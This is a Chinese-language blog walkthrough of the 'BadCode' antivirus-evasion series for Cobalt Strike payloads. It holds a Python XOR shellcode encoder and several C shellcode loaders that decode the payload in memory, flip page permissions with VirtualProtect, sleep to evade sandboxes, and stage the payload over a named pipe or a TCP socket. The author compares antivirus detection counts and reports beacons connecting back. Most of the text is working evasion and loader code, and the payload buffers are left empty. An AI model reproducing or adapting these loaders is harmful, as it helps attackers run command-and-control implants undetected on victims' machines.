通读BadCode

时间:2024-01-31 07:15:02

简介

就是旋哥的BadCode系列,这次好好通读下,然后我在旋哥的代码上又改了些,加了些注释,里面函数原型等。俺慢慢更新
项目地址:https://github.com/Rvn0xsy/BadCode

第一课

主要介绍了下cs的raw和c,然后就是混淆
旋哥使用Python做的混淆 xor加密,然后我把功能是干啥的都写在了注释里,

import sys
from argparse import ArgumentParser, FileType

def process_bin(num, src_fp, dst_fp, dst_raw):
    shellcode = \'\'
    shellcode_size = 0
    shellcode_raw = b\'\'
    try:
        while True:
            code = src_fp.read(1)                   # 批量读取原始bin文件的1个字节
            if not code:                            # 如果没有东西就跳出循环
                break

            base10 = ord(code) ^ num                # 使用code的ASCII码值 异或 num
            base10_str = chr(base10)                # 然后把异或出来的值再转换为char类型
            shellcode_raw += base10_str.encode()    # 将转换回来的char类型再加密 然后拼接到shellcode_raw里
            code_hex = hex(base10)                  # 转换为16进制
            code_hex = code_hex.replace(\'0x\',\'\')    # 然后把0x替换为空
            if(len(code_hex) == 1):                 # 如果长度==1
                code_hex = \'0\' + code_hex           # 比如是1 就变成01
            shellcode += \'\\x\' + code_hex           # 最后\x01拼接到shellcode里
            shellcode_size += 1                     # 长度+1个字节
            # 然后while读取整个文件 1. xor 2. 转为char 3. 编码 4. 转换
        src_fp.close()                              # 关闭原始的bin文件
        dst_raw.write(shellcode_raw)                # 向新的bin文件写入
        dst_raw.close()                             # 写入完然后关闭
        dst_fp.write(shellcode)                     # 向c文件写入shellcode
        dst_fp.close()                              # 写入完然后关闭
        return shellcode_size                       # 最后返回shellcode的长度
    except Exception as e:                          # 错误处理
        sys.stderr.writelines(str(e))

def main():
    # 以下这些就是设置参数
    # type:参数类型
    # required:是否可以省略参数
    parser = ArgumentParser(prog=\'Shellcode X\', description=\'[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rvn0xsy@gmail.com\')
    parser.add_argument(\'-v\',\'--version\',nargs=\'?\')
    parser.add_argument(\'-s\',\'--src\',help=u\'source bin file\',type=FileType(\'rb\'), required=True)
    parser.add_argument(\'-d\',\'--dst\',help=u\'destination shellcode file\',type=FileType(\'w+\'),required=True)
    parser.add_argument(\'-n\',\'--num\',help=u\'Confused number\',type=int, default=90)
    parser.add_argument(\'-r\',\'--raw\',help=u\'output bin file\', type=FileType(\'wb\'), required=False)
    args = parser.parse_args()
    shellcode_size = process_bin(args.num, args.src, args.dst, args.raw)
    sys.stdout.writelines("[+]Shellcode Size : {} \n".format(shellcode_size))

if __name__ == "__main__":
    main()

21line 默认是\x,转义符的问题 \\x解决

image

第二课

申请内存,并创建线程加载shellcode,然后就是xor解密然后加载
这是一个普通的,并没有xor

#include <Windows.h>

// 入口函数
int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
/* length: 800 bytes */

unsigned char buf[] = "";

// 获取shellcode大小
shellcode_size = sizeof(buf);

/*
函数原型
LPVOID VirtualAlloc(
  LPVOID lpAddress,         // 指向要分配区域的指定起始地址的长指针,如果为NULL系统自动分配
  DWORD dwSize,             // 指定区域的大小
  DWORD flAllocationType,   // 指定分配类型。
  DWORD flProtect           // 指定访问保护的类型
);
*/

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,         // shellcode的大小
    MEM_COMMIT,             // 为指定的页面区域在内存或磁盘上的页面文件中分配物理存储
    PAGE_EXECUTE_READWRITE  // 启用对页面提交区域的执行、读取和写入访问。
    );

/*
void CopyMemory(
  _In_  PVOID   Destination,        // 指向复制块目标起始地址的指针
  _In_  const VOID  *Source,        // 指向要复制的内存块起始地址的指针。
  _In_  SIZE_T  Length              // 要复制的内存大小
);
*/
    
// 将shellcode复制到可执行的内存页中
CopyMemory(shellcode,buf,shellcode_size);   // 1. 刚申请的一块内存(shellcode)   2. 原来的数据的指针   3. 所需大小

/*
HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,			// 安全描述符
  SIZE_T                  dwStackSize,					// 堆栈的初始大小,如果为0系统给一个默认的
  LPTHREAD_START_ROUTINE  lpStartAddress,				// 指向要由线程执行的应用程序定义函数的指针
  __drv_aliasesMem LPVOID lpParameter,					// 指向要传递给线程的变量的指针
  DWORD                   dwCreationFlags,				// 创建线程的标志
  LPDWORD                 lpThreadId					// 线程ID
);
*/

// 创建线程
hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 栈的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函数
    NULL, // 参数
    NULL, // 线程标志
    &dwThreadId // 线程ID
    );

/*
DWORD WaitForSingleObject(
  HANDLE hHandle,				// HANDLE
  DWORD  dwMilliseconds			// 如果指定了非零值,则函数会等待,直到对象发出信号或间隔结束。如果dwMilliseconds为零,如果对象没有发出信号,函数不会进入等待状态;它总是立即返回。
  如果dwMilliseconds是INFINITE,则该函数将仅在对象收到信号时返回。
);
*/

// 等待线程
WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束, INFINITE是一个宏
    return 0;
}

利用xor解密
image
这里shellcode[i]每一个与0x10再异或,得出原始的shellcode,再进行加载

#include <Windows.h>
#include <stdio.h>

int main()
{
	unsigned char buf[] = "";
	int length = sizeof(buf) / sizeof(buf[0]);
	for (int i = 0; i<length - 1; i++)
	{
		buf[i] ^= 0x10;
	}
	for (int i = 0; i < sizeof(buf)/sizeof(buf[0]); i++)
	{
		printf("\\x%x", buf[i]);
	}
}

自己写的一个xor的加密代码 0x10就是key

第三课

主要是利用VirtualProtect函数改变VirtualAlloc申请地址的属性

#include <Windows.h>

int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
    DWORD dwOldProtect; // 内存页属性

unsigned char buf[] = "";


// 获取shellcode大小
shellcode_size = sizeof(buf);

/* 增加异或代码 */
for(int i = 0;i<shellcode_size; i++){
    buf[i] ^= 10;
}

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,
    MEM_COMMIT,
    PAGE_READWRITE // 启用对页面提交区域的读写访问。不再是可读可写可执行
    );

    // 将shellcode复制到可读可写的内存页中
CopyMemory(shellcode,buf,shellcode_size);

/*
函数原型
BOOL VirtualProtect(
  LPVOID lpAddress,             // 要更改访问保护属性的页面区域的起始页面地址。 我们要修改shellcode的属性,就是shellcode
  SIZE_T dwSize,                // 大小
  DWORD  flNewProtect,          // 内存保护选项
  PDWORD lpflOldProtect         // 指向一个变量的指针,该变量接收指定页面区域中第一页的先前访问保护值;也就是某个地址
);
*/

// 这里开始更改它的属性为可执行
VirtualProtect(shellcode,shellcode_size,PAGE_EXECUTE,&dwOldProtect);    // 1. 被更改的 2. 大小 3. 启用对页面提交区域的执行访问(原来只是可读可写) 4. 原来的属性

// 等待几秒,兴许可以跳过某些沙盒呢?
Sleep(2000);

hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 栈的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函数
    NULL, // 参数
    NULL, // 线程标志
    &dwThreadId // 线程ID
    );

WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束
    return 0;
}

其实这里修改的地方只有

  1. 申请的时候,光申请了可读可写,但是并不能执行
  2. 利用VirtualProtect函数修改shellcode的属性,并变成了可执行

image
报了六个的是普通的申请可读可写可执行权限的xor解密执行,报了四个的是先申请可读可写,后又修改属性变成可执行的程序

然后再在上面的代码的基础上,不使用手动异或来进行操作,使用自带函数
在测这个的时候,我还以为不上线呢,最后发现是sleep的问题 得等段时间了 然后我做了下输出、

InterlockedXor8这个函数是对char值做异或,(但是我觉得做正常手动异或,应该没事吧)

LONG InterlockedXor(
  LONG volatile *Destination,		// 指向第一个操作数的指针。该值将替换为操作的结果。 所以要+i,向后走 一个个异或替换
  LONG          Value
);

image

最后测试也是4个报毒,看来我之前的猜测没有错

第四课

这一节就涉及到命名管道和文件的操作读写,代码比较多一些,注释也比较多一些,所以比较杂乱
整体的代码思路也就是,创建一个管道,然后调用RecvShellcode函数,将shellcode写入管道,最后再通过读取管道中的内容,xor解密,最后申请内存,并加载shellcode

#include <Windows.h>
#include <stdio.h>
#include <intrin.h>
#define BUFF_SIZE 1024

PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");      // 匿名管道的名称 也就是 \\.\pipe\BadCodeTest
char buf[] = "";

BOOL RecvShellcode(VOID) {
	HANDLE hPipeClient;                     // 客户端的句柄
	DWORD dwWritten;                        // 写入长度 dwWriteLen不更好 哈哈
	DWORD dwShellcodeSize = sizeof(buf);    // shellcode的长度
											// 等待管道可用
	WaitNamedPipe(ptsPipeName, NMPWAIT_WAIT_FOREVER);    // 等待\\.\pipe\BadCodeTest有信号,

	/*
	HANDLE CreateFileA(
		LPCSTR                lpFileName,                 // 要创建或打开的文件或设备的名称
		DWORD                 dwDesiredAccess,            // 请求的对文件或设备的访问,读,写,读或写
		DWORD                 dwShareMode,                // 请求的文件或设备的共享模式,删除,读取,写入
		LPSECURITY_ATTRIBUTES lpSecurityAttributes,       // 安全描述符
		DWORD                 dwCreationDisposition,      // 对存在或不存在的文件或设备采取的操作,通常为:OPEN_EXISTING
		DWORD                 dwFlagsAndAttributes,       // 文件或设备属性和标志
		HANDLE                hTemplateFile               // 具有GENERIC_READ访问权限的模板文件的有效句柄
	);
	*/

	// 连接\\.\pipe\BadCodeTest,然后请求对文件的写入,客户端只读取,安全描述为为NULL,打开文件或设备,文件没有其他属性,没有句柄
	hPipeClient = CreateFile(ptsPipeName,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING ,FILE_ATTRIBUTE_NORMAL,NULL);

	if(hPipeClient == INVALID_HANDLE_VALUE){            // 判断是否失败,失败的返回值是INVALID_HANDLE_VALUE
	printf("[+]Can\'t Open Pipe , Error : %d \n",GetLastError());
	return FALSE;
	}

	/*
	BOOL WriteFile(
		HANDLE       hFile,                   // 文件或 I/O 设备的句柄
		LPCVOID      lpBuffer,                // 要写入的数据,要写入shellcode,就是shellcode
		DWORD        nNumberOfBytesToWrite,   // 要写入文件或设备的字节数
		LPDWORD      lpNumberOfBytesWritten,  // 该接收使用同步时写入的字节数
		LPOVERLAPPED lpOverlapped             // 如果hFile参数是用FILE_FLAG_OVERLAPPED打开的,则需要指向OVERLAPPED结构的指针,否则该参数可以为 NULL。
	);
	*/

														 // 写入shellcode
	WriteFile(hPipeClient, buf, dwShellcodeSize, &dwWritten, NULL);     // WriteFile写入文件,写入到\\.\pipe\BadCodeTest里
	if (dwWritten == dwShellcodeSize) {       // 如果成功写入,这两个应该是一样的
		CloseHandle(hPipeClient);           // 然后关掉句柄 打印成功,返回成功
		printf("[+]Send Success ! Shellcode : %d Bytes\n", dwShellcodeSize);
		return TRUE;
	}
	CloseHandle(hPipeClient);   // 如果不成功,关掉句柄 返回失败
	return FALSE;
}

int wmain(int argc, TCHAR * argv[]) {

	HANDLE hPipe;                   // 匿名管道的句柄
	DWORD dwError;                  // Error的接收值
	CHAR szBuffer[BUFF_SIZE];       // Buff大小 宏定义了BUFF_SIZE = 1024
	DWORD dwLen;                    // 读取字节数变量的指针
	PCHAR pszShellcode = NULL;      // shellcode
	DWORD dwOldProtect; // 内存页属性
	HANDLE hThread;                 // 线程句柄
	DWORD dwThreadId;               // 线程ID

	/*
	// 创建命名管道的实例并返回用于后续管道操作的句柄
	HANDLE CreateNamedPipe(
		LPCSTR                lpName,                     // 命名管道的名称
		DWORD                 dwOpenMode,                 // 开放模式
		DWORD                 dwPipeMode,                 // 管道模式
		DWORD                 nMaxInstances,              // 管道创建的最大实例数,可接受的值在 1 到PIPE_UNLIMITED_INSTANCES (255)的范围内
		DWORD                 nOutBufferSize,             // 为输出缓冲区保留的字节数
		DWORD                 nInBufferSize,              // 为输入缓冲区保留的字节数
		DWORD                 nDefaultTimeOut,            // 默认超时值,零值将导致默认超时为 50 毫秒。
		LPSECURITY_ATTRIBUTES lpSecurityAttributes        // 老朋友了 安全描述符
	);
	*/

	hPipe = CreateNamedPipe(
		ptsPipeName,                    // \\.\pipe\BadCodeTest
		PIPE_ACCESS_INBOUND,            // 管道中的数据流仅从客户端到服务器
		PIPE_TYPE_BYTE | PIPE_WAIT,      // PIPE_TYPE_BYTE:数据作为字节流写入管道,PIPE_WAIT:阻塞模式启用,等到有数据要读取、所有数据都已写入或客户端已连接时,操作才会完成
		PIPE_UNLIMITED_INSTANCES,       // PIPE_UNLIMITED_INSTANCES也就是最大的255
		BUFF_SIZE,                      // 1024
		BUFF_SIZE,                      // 1024
		0,                              // 50MS
		NULL);                          // 空

	if (hPipe == INVALID_HANDLE_VALUE) {      // 也就是如果函数失败了(INVALID_HANDLE_VALUE)
		dwError = GetLastError();           // 获取错误信息
		printf("[-]Create Pipe Error : %d \n", dwError);     // 然后打印
		return dwError;
	}


	// 创建一个写入shellcode的线程
	CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)RecvShellcode, NULL, NULL, NULL);

	/*
	BOOL ConnectNamedPipe(
	HANDLE       hNamedPipe,          // 命名管道实例的服务器端的句柄
	LPOVERLAPPED lpOverlapped         // 如果客户端在调用函数后连接,则成功的同步操作会导致函数返回非零值
	);
	*/

	if (ConnectNamedPipe(hPipe, NULL) > 0) {                   // 其实我觉得这里改为 !=0 应该更好
		printf("[+]Client Connected...\n");                 // 客户端连接
		/*
		BOOL ReadFile(
			HANDLE       hFile,                   // 设备句柄
			LPVOID       lpBuffer,                // 指向接收从文件或设备读取的数据的缓冲区的指针
			DWORD        nNumberOfBytesToRead,    // 读取的最大字节数
			LPDWORD      lpNumberOfBytesRead,     // 一个指向接收使用同步hFile参数时读取的字节数的变量的指针
			LPOVERLAPPED lpOverlapped             // 如果hFile参数是用FILE_FLAG_OVERLAPPED打开的, 则需要指向OVERLAPPED结构的指针,否则它可以是NULL。
		);
		*/
		ReadFile(hPipe, szBuffer, BUFF_SIZE, &dwLen, NULL);     // ReadFile读取文件,从hPipe读取到szBuffer里,最大数是1024
		printf("[+]Get DATA Length : %d \n", dwLen);         // 打印长度

		// 剩下的都是老一套了

		// 申请内存页
		pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen, MEM_COMMIT, PAGE_READWRITE);
		// 拷贝内存
		CopyMemory(pszShellcode, szBuffer, dwLen);

		for (DWORD i = 0; i< dwLen; i++) {
			Sleep(50);
			InterlockedXor8(pszShellcode + i, 0X10);
			printf("%c \n", pszShellcode[i]);
		}

		// 这里开始更改它的属性为可执行
		VirtualProtect(pszShellcode, dwLen, PAGE_EXECUTE, &dwOldProtect);
		// 执行Shellcode
		hThread = CreateThread(
			NULL, // 安全描述符
			NULL, // 栈的大小
			(LPTHREAD_START_ROUTINE)pszShellcode, // 函数
			NULL, // 参数
			NULL, // 线程标志
			&dwThreadId // 线程ID
		);

		WaitForSingleObject(hThread, INFINITE);
	}

	return 0;
}

因为解密有些慢,所以上线要等一会,我打印出来比较明显
image
等到跑完,就上线了。也可以分开整个Server端,写入管道,client端 读取然后加载

第五课

也就是分离免杀了,有上面的命名管道实现分离免杀,还有网络传输实现分离免杀
命名管道的因为上面写的比较细,我这下面就写的粗略一点了,但是网络传输的还是会仔细一些

命名管道

一开始按照我自己的思路敲的 但是不可以,我的思路还是有问题

Server

#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#define BUFF_SIZE 1024
char buf[] = "";

PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");

BOOL RecvShellcode(VOID) {
	DWORD dwError;
	HANDLE hPipeClient;
	DWORD dwWritten;
	DWORD dwShellcodeSize = sizeof(buf);
	HANDLE hPipe;

	// 等待管道可用
	WaitNamedPipe(ptsPipeName, NMPWAIT_WAIT_FOREVER);
	// 连接管道
	hPipeClient = CreateFile(ptsPipeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (hPipeClient == INVALID_HANDLE_VALUE) {
		printf("[+]Can\'t Open Pipe , Error : %d \n", GetLastError());
		return FALSE;
	}

	WriteFile(hPipeClient, buf, dwShellcodeSize, &dwWritten, NULL);
	if (dwWritten == dwShellcodeSize) {
		CloseHandle(hPipeClient);
		printf("[+]Send Success ! Shellcode : %d Bytes\n", dwShellcodeSize);
		return TRUE;
	}
	CloseHandle(hPipeClient);
	return FALSE;
}

int wmain(int argc, TCHAR * argv[]) {

	RecvShellcode();

	return 0;
}

Server没啥可说的,就是等待命名管道的信号,然后将shellcode写入

Client

#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#define BUFF_SIZE 1024
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");

int wmain(int argc, TCHAR * argv[]) {

	HANDLE hPipe;
	DWORD dwError;
	CHAR szBuffer[BUFF_SIZE];
	DWORD dwLen;
	PCHAR pszShellcode = NULL;
	DWORD dwOldProtect; // 内存页属性
	HANDLE hThread;
	DWORD dwThreadId;

	hPipe = CreateNamedPipe(
		ptsPipeName,                    // \\.\pipe\BadCodeTest
		PIPE_ACCESS_INBOUND,            // 管道中的数据流仅从客户端到服务器
		PIPE_TYPE_BYTE | PIPE_WAIT,      // PIPE_TYPE_BYTE:数据作为字节流写入管道,PIPE_WAIT:阻塞模式启用,等到有数据要读取、所有数据都已写入或客户端已连接时,操作才会完成
		PIPE_UNLIMITED_INSTANCES,       // PIPE_UNLIMITED_INSTANCES也就是最大的255
		BUFF_SIZE,                      // 1024
		BUFF_SIZE,                      // 1024
		0,                              // 50MS
		NULL);                          // 空

	if (hPipe == INVALID_HANDLE_VALUE) {      // 也就是如果函数失败了(INVALID_HANDLE_VALUE)
		dwError = GetLastError();           // 获取错误信息
		printf("[-]Create Pipe Error : %d \n", dwError);     // 然后打印
		return dwError;
	}

	if (ConnectNamedPipe(hPipe, NULL) > 0) {
		printf("[+]Client Connected...\n");
		ReadFile(hPipe, szBuffer, BUFF_SIZE, &dwLen, NULL);
		printf("[+]Get DATA Length : %d \n", dwLen);
		// 申请内存页
		pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen, MEM_COMMIT, PAGE_READWRITE);
		// 拷贝内存
		CopyMemory(pszShellcode, szBuffer, dwLen);

		for (DWORD i = 0; i< dwLen; i++) {
			InterlockedXor8(pszShellcode + i, 0X10);
			printf("%c \n", pszShellcode[i]);
		}

		// 这里开始更改它的属性为可执行
		VirtualProtect(pszShellcode, dwLen, PAGE_EXECUTE, &dwOldProtect);
		// 执行Shellcode
		hThread = CreateThread(
			NULL, // 安全描述符
			NULL, // 栈的大小
			(LPTHREAD_START_ROUTINE)pszShellcode, // 函数
			NULL, // 参数
			NULL, // 线程标志
			&dwThreadId // 线程ID
		);

		WaitForSingleObject(hThread, INFINITE);
	}

	return 0;
}

客户端创建了匿名管道后,然后服务端获取信号,立即写入shellcode,然后获取解密 加载执行

image
image

SOCKET

我日 旋哥的这个写法和我自己的思路有点不一样;
先看服务端,但是旋哥叫客户端,我有点理解不了 哈哈
image
我觉得服务端是发送shellcode的,客户端是接收shellcode并加载的

整体的思路就是Client端运行后监听 然后Server端发送shellcode,客户端接收;其实可以服务端监听 等待有消息后然后发送,因为我原来写分离免杀就是这个样,看我以后懒不懒了,要是不懒就发出来

Server
下面的inet_addr("10.10.0.142"),要换成监听的Client端的IP

#include <WinSock2.h>
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#pragma comment(lib,"ws2_32.lib")		// 加载ws2_32.lib库文件
char buf[] = "";	// shellcode

int wmain(int argc, TCHAR argv[]) {		// 入口函数
	DWORD dwError;						// 接收错误的变量
	WORD sockVersion = MAKEWORD(2, 2);	// 版本
	WSADATA wsaData;					// WSADATA数据结构的指针 ,用于接收 Windows 套接字实现的详细信息
	SOCKET socks;						// 一个SOCKET套接字
	SHORT sListenPort = 8888;			// 监听端口
	struct sockaddr_in sin;				// SOCKADDR_IN 结构为AF_INET地址族指定传输地址和端口

	if (WSAStartup(sockVersion, &wsaData) != 0)		// 使用Winsock 2 DLL,用于初始化WinSock;如果成功, WSAStartup函数返回零
	{
		dwError = GetLastError();
		printf("[*]WSAStarup Error : %d \n", dwError);
		return dwError;
	}

	/*
	SOCKET WSAAPI socket(
	  int af,			// 地址族规范,AF_INET:IPV4
	  int type,			// 新套接字的类型规范。SOCK_STREAM是一种套接字类型,通过 OOB 数据传输机制提供有序的、可靠的、双向的、基于连接的字节流。此套接字类型使用 Internet 地址族(AF_INET 或 AF_INET6)的传输控制协议 (TCP)。
	  int protocol		// 要使用的协议
	);	
	*/
	socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);	// 建立SOCKET套接字

	if (socks == INVALID_SOCKET)		// 如果失败就返回INVALID_SOCKET
	{
		dwError = GetLastError();
		printf("[*]Socket Error : %d \n", dwError);
		return dwError;
	}

	// 然后配置sockaddr_in结构体
	sin.sin_family = AF_INET;			// 传输地址的地址族。此成员应始终设置为 AF_INET。
	sin.sin_port = htons(sListenPort);	// 传输协议端口号,htons:将主机的无符号短整形数转换成网络字节顺序
	sin.sin_addr.S_un.S_addr = inet_addr("10.10.0.142");	// 也就是客户端的ip 包含 IPv4 传输地址的 IN_ADDR结构。inet_addr函数转换包含IPv4的字符串点分十进制地址转换成一个适当的地址 IN_ADDR结构

	/*
	int WSAAPI connect(
	  SOCKET         s,				// 标识未连接套接字的描述符
	  const sockaddr *name,			// 指向应建立连接的sockaddr结构的指针 。
	  int            namelen		// 指向的sockaddr结构的长度
	);
	*/

	if (connect(socks, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)	// 链接到制定的socket
	{
		dwError = GetLastError();
		printf("[*]Bind Error : %d \n", dwError);
		return dwError;
	}
	/*
	int WSAAPI send(
	  SOCKET     s,			// 已连接的socket套接字
	  const char *buf,		// 要发送的数据
	  int        len,		// 长度
	  int        flags		// 一组指定调用方式的标志
	);
	*/
	int ret = send(socks, buf, sizeof(buf), 0);	// 往指定的socket上发送数据

	if (ret > 0)	// 如果没有发生错误, send返回发送的总字节数
	{
		printf("[+]Send %d-Bytes \n", ret);
		closesocket(socks);	// 发送完数据就关闭套接字
	}

	WSACleanup();	// 终止使用
	return 0;
}

Client

#include <WinSock2.h>
#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#pragma comment(lib,"ws2_32.lib")

BOOL RunCode(CHAR * code, DWORD dwCodeLen)	// 执行ShellCode的函数,这里又不解释了
{
	HANDLE hThread;
	DWORD dwOldProtect;
	DWORD dwThreadId;
	PCHAR pszShellcode = (PCHAR)VirtualAlloc(NULL, dwCodeLen, MEM_COMMIT, PAGE_READWRITE);
	CopyMemory(pszShellcode, code, dwCodeLen);

	for (DWORD i = 0; i< dwCodeLen; i++) {
		InterlockedXor8(pszShellcode + i, 0X10);
		printf("%c \n", pszShellcode[i]);
	}
	// 这里开始更改它的属性为可执行
	VirtualProtect(pszShellcode, dwCodeLen, PAGE_EXECUTE, &dwOldProtect);
	// 执行Shellcode
	hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)pszShellcode,NULL,NULL,&dwThreadId);
	WaitForSingleObject(hThread, INFINITE);
	return TRUE;
}

int wmain(int argc, TCHAR argv[]) {
	// 下面的参数和服务端的差不多 就不解释了,其实看变量名很多都知道是干什么的
	CHAR buf[1024];		// 要接收的shellcode
	DWORD dwError;		
	WORD sockVersion = MAKEWORD(2, 2);
	WSADATA wsaData;
	SOCKET socks;
	SOCKET sClient;						// recv等待成功后会返回一个新的套接字
	struct sockaddr_in s_client;		// 接收连接实体的地址
	INT nAddrLen = sizeof(s_client);	// 一个指向整数的可选指针,该整数包含由addr参数指向的结构的长度
	SHORT sListenPort = 8888;
	struct sockaddr_in sin;

	if (WSAStartup(sockVersion, &wsaData) != 0)	// 老一套
	{
		dwError = GetLastError();
		printf("[*]WSAStarup Error : %d \n", dwError);
		return dwError;
	}

	socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);	// 老一套

	if (socks == INVALID_SOCKET)		// 老一套
	{
		dwError = GetLastError();
		printf("[*]Socket Error : %d \n", dwError);
		return dwError;
	}

	sin.sin_family = AF_INET;	
	sin.sin_port = htons(sListenPort);		// 端口
	sin.sin_addr.S_un.S_addr = INADDR_ANY;	// INADDR_ANY就是指定地址为0.0.0.0的地址 因为他是监听

	/*
	int WSAAPI bind(
	  SOCKET         s,			// 未绑定套接字
	  const sockaddr *name,		// 要分配给绑定套接字的本地地址的sockaddr结构的指针。
	  int            namelen	// 长度
	);
	*/
	if (bind(socks, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)	// 进行绑定
	{
		dwError = GetLastError();
		printf("[*]Bind Error : %d \n", dwError);
		return dwError;
	}

	/*
	int WSAAPI listen(
	  SOCKET s,			// 标识绑定的未连接套接字
	  int    backlog	// 处理的最大长度
	);
	*/
	if (listen(socks, 5) == SOCKET_ERROR)	// 监听
	{
		dwError = GetLastError();
		printf("[*]Listen  Error : %d \n", dwError);
		return dwError;
	}
	else
	{
		printf("开启监听\n");
	}

	/*
	SOCKET WSAAPI accept(
	  SOCKET   s,			// 标识已使用侦听功能置于侦听状态的套接字,也就是我们上面listen的第一个参数
	  sockaddr *addr,		// 一个可选的指向缓冲区的指针,该缓冲区接收连接实体的地址
	  int      *addrlen		// 一个指向整数的可选指针,该整数包含由addr参数指向的结构的长度
	);
	*/
	sClient = accept(socks, (SOCKADDR *)&s_client, &nAddrLen);	// 接受要发过来的请求

	/*
	int WSAAPI recv(
	  SOCKET s,			// 已连接套接字的描述符,可以理解成以接受的那个变量
	  char   *buf,		// 接收传入数据到指定的缓冲区的指针
	  int    len,		// 接收的长度
	  int    flags		// 一组影响此函数行为的标志
	);
	*/
	int ret = recv(sClient, buf, sizeof(buf), 0);	// 接收数据 shellcode
	if (ret > 0)	// 如果接收成功,关闭两个套接字
	{
		printf("[+]Recv %d-Bytes \n", ret);
		closesocket(sClient);
		closesocket(socks);
	}

	WSACleanup();	// 关闭
	RunCode(buf, sizeof(buf));	// 然后加载shellcode
	return 0;
}

然后测试,运行Client 开始监听,运行Server发送shellcode到Client,加载执行
image
上线成功
image